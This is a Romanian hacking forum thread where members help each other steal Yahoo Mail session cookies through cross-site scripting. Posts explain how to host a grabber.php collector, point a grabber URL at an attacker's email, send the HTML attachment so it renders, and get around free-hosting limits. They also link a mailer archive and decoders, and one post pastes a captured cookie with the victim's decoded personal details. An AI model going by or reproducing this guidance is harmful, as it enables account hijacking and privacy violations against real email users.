Jump to content
Guest Nemessis

Yahoo Mail cookie exploit

Recommended Posts

McAfee has detected an infected file that cannot be repaired.

Details

Detection: JS/Exploit-CrossSite (Trojan)

File Path: C:Documents and SettingsGabytzuLocal SettingsTemporary Internet FilesContent.IE5CLQNOTIVresult.html;_ylt=Auxh9be9E69K5l8hdmj[1].PAbnMrQs

More Info

Trojan horses appear to be legitimate programs but can disrupt, damage, or provide unauthorized access to your computer.

McAfee recommends that you quarantine or remove this file. McAfee also recommends that you scan your computer for other threats.

Link to comment
Share on other sites

Guest Nemessis

Repet. Schimbati hostul. Evitati hostingul gratuit. Nu puneti intrebari de genul "si unde sa urc php-ul" pentru ca s-au mai pus astfel de intrebari si nu veti primi nici un raspuns. Daca preferati sa folositi un php nesigur atunci folositi-l pe acesta

Nu garantez ca datele furate de voi nu vor ajunge si in alta parte dar macar va faceti treaba.
Link to comment
Share on other sites

era pe milw0rm, un tutorial facut de cineva, tor...nu stiu cum....in fine, in care am inteles ca reusise sa faca in asa fel, incat , cand deschideai emailul sa il citesti , gata deja era dus cookie.nu trebuia sa dai click pe nimica.ne poate explica si noua cineva calumea acel tutorial? sincer pe mine ma bagat in ceva mai multa bezna.

Link to comment
Share on other sites

Guest Nemessis

Asa era si primul exploit de cookie pe care l-am postat aici. Majoritatea sintaxelor de filter bypass sunt deja patched de Yahoo. Este din ce in ce mai greu sa gasesti un mod de a fura cookie de la Yahoo dar nu imposibil. Iti da multa durere de cap :) Daca vrei sa le vei pe cele vechi uita-te la posturile mele de la inceput.

Link to comment
Share on other sites

Nemessis wrote: Asa era si primul exploit de cookie pe care l-am postat aici. Majoritatea sintaxelor de filter bypass sunt deja patched de Yahoo. Este din ce in ce mai greu sa gasesti un mod de a fura cookie de la Yahoo dar nu imposibil. Iti da multa durere de cap :) Daca vrei sa le vei pe cele vechi uita-te la posturile mele de la inceput.

k.mersi mult de raspuns ;)

Link to comment
Share on other sites

Nemessis wrote: Asa era si primul exploit de cookie pe care l-am postat aici. Majoritatea sintaxelor de filter bypass sunt deja patched de Yahoo. Este din ce in ce mai greu sa gasesti un mod de a fura cookie de la Yahoo dar nu imposibil. Iti da multa durere de cap :) Daca vrei sa le vei pe cele vechi uita-te la posturile mele de la inceput.

...pai metoda ta care ii in acest thread inca merge boboc (cel putin la mine)...azi o venit iar "Master You Have a Sucker"...dar metoda turcului nush...am incercat sa fac combinatia ce zice el dar nu mio iesit...poate nu am facut bine sau poate nu mai merge dar...merita incercat...

...am mai vazut ca unii ar mai si decoda cookie-ul dar nush cum dreaq ca,cica cookie-ul de la Yahoo ar fi doar "one way"...

...oricum aici

http://sec.drorshalev.com//dev/yahoo/vbs.asp 

cica odata era un Yahoo Cookie Decoder....nush daca o functionat vreodata...who knows?

....si tot ei peacolo

http://sec.drorshalev.com/dev/yahoo/yahooxss.htm

se lauda cum ca ar fi foarte simplu (kkt).

..si am mai vazut cativa care se lauda cum ca lear decoda dar nu ofera si solutii...

Pareri?

Link to comment
Share on other sites

Guest Nemessis

Metoda lui Totonq e patched dar cu turcul nu te intelegi. Se agata si omul de o reusita de-a lui toata viata. Cred ca daca ii dadeam paste la toate versiunile vechi (nu facute de mine dar pe care le-am avut mai mereu cand acestea functionau) isi taia ouale. In fine ce pretentii sa ai de la un om care se autointituleaza "King of XSS" si care ii spune lui RSnake ( http://ha.ckers.org/blog/20060901/masking-xss-attacks ) ca a gasit pe site-ul lui jumatate de XSS (exista jumatati de exploituri si eu nu stiam?). Bine ca i-a f***t Mihai Viteazul pe turci la poponet.

Problema sta astfel:

- Cookie de la Yahoo este decriptabil insa NU GASITI PAROLA in cookie.

- In cookie gasiti numai datele personale sub forma prezentata de drorshalev ( http://sec.drorshalev.com//dev/yahoo/vbs.asp ).

- Cookie este valabil 24 de ore orice ati face si din cate stiu este valabil chiar daca victima da sign out dar nu si daca isi schimba parola sau vreo data personala gen codul zip.

- Daca gasiti un serviciu al Yahoo ce este vulnerabil la Cross Site Scripting il puteti folosi pentru a fura cookie deoarece Yahoo foloseste acelasi user si aceeasi parola la toate serviciile sale.

Hostingul:

- Nu folositi hosting gratuit. Oricat repetam noi aici chestia asta voi mereu incercati sa puneti pe lx.ro, as.ro sau evonet.ro. DE CE??? Daca nu functioneaza acum pe serverele lor de ce ar functiona vreodata? Pe lx.ro a mers dar nu mai merge.

Mailer:

- A postat o gramada de lume mailere pe forum dar ca sa nu par baiat rau mai urc eu odata arhiva (http://share.urbanfriends.us/uploads/aa37a5ad0f.rar). Aceeasi problema ca mai sus. NU FOLOSITI HOSTING GRATUIT!!! Nu va functiona.

Sper ca am lamurit destule persoane prin cele zise mai sus.

Link to comment
Share on other sites

Nemessis wrote:

Problema sta astfel:

- Cookie de la Yahoo este decriptabil insa NU GASITI PAROLA in cookie.

- In cookie gasiti numai datele personale sub forma prezentata de drorshalev ( http://sec.drorshalev.com//dev/yahoo/vbs.asp ).

...ok..Normal turcu-i turc...am vazut ca el si cu DarkProfits erau "amici" sau cel putin pareau...oricum nu cred ca asta mai conteaza acum...

..dar zi o metoda (o idee ceva) cum sa decriptezi un cookie...acolo la link nu merge(sau?)...dupa cate am vazut la cei ce or decriptat la parola era Prompt For Pass ...chiar daca in linkul de mai sus se zicea ca parola ii n= ( acum unde o fi n...?)

...

(ex. vazut :cookie: 'B=a5ls4sl1ou2gj&b=3&s=vf; Q=q1=AACAAAAAAAAAAA--&q2=Q4.Gag--; YMBM=d=&v=1; HP=1; B=aknfdsh1n1nma&b=2; Q=q1=AACAAAAAAAAAeg--&q2=Q3lEag--; F=a=O6BTyOEsvdCZXT6DSYqQKNld_o_rbz20vsm9XOFoKumLM6qCeJkKbQpuz2tr&b=EMyn; C=mg=1; CP=v=60102&br=i&sp=; LYC=l_v=2&l_lv=9&l_l=0d3h420k_1e1e&l_l_lid=1ffs22g&l_r=dj&l_um=0_0_0_0_0; U=mt=e8c85J2MhYq3GpbVwQvnIm3CcW13MofRIj9YlQ--&ux=af2eDB&un=emetc5jg6igaa; Y=v=1&n=ciqmf24r54r7n&l=i70g_270hed/o&p=m2mvvro013i60000&jb=16|47|&iz=2400&r=bs&lg=us&intl=us&np=1; YMBM=d=&v=1; YGCV=d=; T=z=sMsjDBsSBkDBrfo65/4WDF2NDZOBjY2Mk5OTjI0NDI-&a=QAE&sk=DAAyQS.KHm/nvR&d=c2wBTXpFNUFURXhOVGs1T1RVek16VS0BYQFRQUUBdGlwAVdKU0JhRAF6egFzTXNqREJnV0E-; YM.Gen=i=vaIa6Ur8iCzhU2jjLHpwZz0lUA--&v=1'

...decodat: Cookie Created : 23/11/1971 00:57:55 GMT
Yahoo-ID : shaq_charon
Gender : Male
Year Of Birth : 1986
ZipCode : 2400
Country : Romania
Prompt For Pass :
Language : English - United States
Int. Lang. & Cont. : English - United States
Industry : Other


credit: carlo )

...cu ceva date obtinute se ajunge la intrebarea secreta si sansele vin ...dar spune o metoda de decriptare...se zice ca ii fff greu...incearcane :)

Link to comment
Share on other sites

Nemessis wrote: Parerea mea este urmatoarea: daca se putea decripta parola din cookie deja cineva facea asta nu? :) Este doar parerea mea.

... da,...ok...dar eu ziceam (insistam defapt) pe metoda aia care decripteaza un Cookie de la Yahoo...

...METODA...nu ma intereseaza prea mult ce iese...doar Metoda care o folosesti...ca am vazut ca spuneai : citez: "Nemesis: Cookie de la Yahoo este decriptabil..."...si am banuit ca poate sti cum...daca nu am banuit bine sry...daca da Spunene odata metoda :D ...

Link to comment
Share on other sites

Nemessis wrote: Exact asa cum ai vazut si tu ca se face pe site-ul lui drorshalev.

...aha cred ca te referi la copy - paste in

http://sec.drorshalev.com//dev/yahoo/vbs.asp

...atat am vazut acolo vizavi de metode de decodare...

...dar nu mai merge...o sa mai cercetez sa vad daca gasesc ceva...

Thx..

Bafta

Link to comment
Share on other sites

Eu am o problema ... am atasat HTMLu si imi apare ca plain text .. nu ca html attachement .. am cautat pe la setari si tot nu merge. Am 2 conturi la yahoo si la nici unu nu merge... Vreo solutie? :)

EDIT

Am rezolvat cu chestia asta, OK ... dar am alta problema :) lx.ro si as.ro au functia mail() activata ... dau click pe text/buton exact cum scrie la carte ... dar problema e ca nu-mi vine mailu' cu cookie'ul in casuta de mail .... daca trimita cu alta script mail() mail de pe lx.ro, vine mailu... deci sa fie bulit grabber.php ?

Link to comment
Share on other sites

recuento wrote: Asta se intampla fiindca ai trimis plain text , nu html , daca esti sigur totusi ca ai trimis html activeaza din optiunile yahoo sa afiseze html-ul
The HTML graphics in this message have been displayed. [Edit Preferences - What's This?]

La tine apare ca fisierul primit e plain text

Si mie la fel imi apare.Cum naiba trimit ca html? Am schimbat extensia in html , am incercat si htm am atasat dar tot la fel imi apare.

EDIT: lol, am rezolvat si io , acu astept sa primesc mailu

Link to comment
Share on other sites

ludic cum ai rezolvat pe yahoo? Ca eu am rezolvat-o in urmatoru fel ... trmit de pe Gmail :) De acolo pot trimite html ca atasament .. in fine, nu asta ma "deranjeaza" .. ci faza ca nu-mi vine mail cu cookie-ul ... :( Sa fie bulit grabber.php ? Ca hostu lx.ro permite functia mail() (am incercat-o si merge)

Link to comment
Share on other sites

...ma so mai scris de n ori...SCHIMBATI HOSTUL...

...as.ro , lx.ro si aste free merg DAR NU INTOTDEAUNA...sunt INSTABILE OK???...

...scarto tu zici ca daca pui alt script iti vine emailul...ok bun!....dar in "Cookie Script" ai pus emailul tau si ai schimbat acolo siteul ???


Citat:
<'http://www.site.com/grabber.php?email=mailultau@yahoo.com

...deci aici in script ai pus in loc de site.com siteul unde sta grabber.php pus de tine (si vezi ca daca pe site ai pus index.php atunci pune si acolo tot site.com/index.php nu grabber.php....(stiu io pe cineva care o facut asa)...Capisci????si ai schimbat cu mailul unde vrei sa iti vina Cookieul???

...daca nu ai facut asa ..atunci fa...si daca ai facut atunci mai reciteste odata...ca asta inca mai merge...

Link to comment
Share on other sites

Scarto wrote: ludic cum ai rezolvat pe yahoo? Ca eu am rezolvat-o in urmatoru fel ... trmit de pe Gmail :) De acolo pot trimite html ca atasament .. in fine, nu asta ma "deranjeaza" .. ci faza ca nu-mi vine mail cu cookie-ul ... :( Sa fie bulit grabber.php ? Ca hostu lx.ro permite functia mail() (am incercat-o si merge)

Ca sa-ti recunoasca Yahoo fisieru ca script html pune la incputul scriptului "<HTML>" (fara ghilimele) in fiserul editat in notepad caruia apoiii dai extensia .htm .Normal ar fi sa pui si la sfarsitul scriptului </HTML> da mere si fara.

Io am alta problema , imi mail de pe lx.ro dar fara cookie .stie cineva de ce?

Asha arata mailu fara cookie care mi vine

Rst-Crew

http://www.rst-crew.net

Date: Tuesday, October 31, 2006, 11:56 am

Cookie:

Rst-Crew

http://www.rst-crew.net

Link to comment
Share on other sites

Guest Nemessis

ludic in partea din dreapta a browserului exista o chestie numita scrollbar. Da click pe bara din dreapta, misca mouseul in sus, CITESTE CE A SCRIS VIRUSSS, ce am scris eu si multi altii la threadul asta cu Yahoo cookie si vei vedea de ce nu iti merge pe lx.ro. Doamne cat de greu e sa citesti ce s-a scris mai sus? Daca nu era pe aceeasi pagina mai ziceam. DAR EXPLICATIA E PE ACEEASI PAGINA CU POSTAREA TA.

Link to comment
Share on other sites

Nemessis wrote: ludic in partea din dreapta a browserului exista o chestie numita scrollbar. Da click pe bara din dreapta, misca mouseul in sus, CITESTE CE A SCRIS VIRUSSS, ce am scris eu si multi altii la threadul asta cu Yahoo cookie si vei vedea de ce nu iti merge pe lx.ro. Doamne cat de greu e sa citesti ce s-a scris mai sus? Daca nu era pe aceeasi pagina mai ziceam. DAR EXPLICATIA E PE ACEEASI PAGINA CU POSTAREA TA.

Imi cer scuze, dupa ce am postat am citit toate posturile si am gasit raspunusu, da n-am mai apucat sa dau edit ca deja ai raspuns.Problema e ca n-am cu ce sa-mi cumpar hosting.Nu sunt

pro carding.O sa incerc pe hostu de care ziceai ca nu-i prea sigur .

Thnx si ..sorry.

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.



×
×
  • Create New...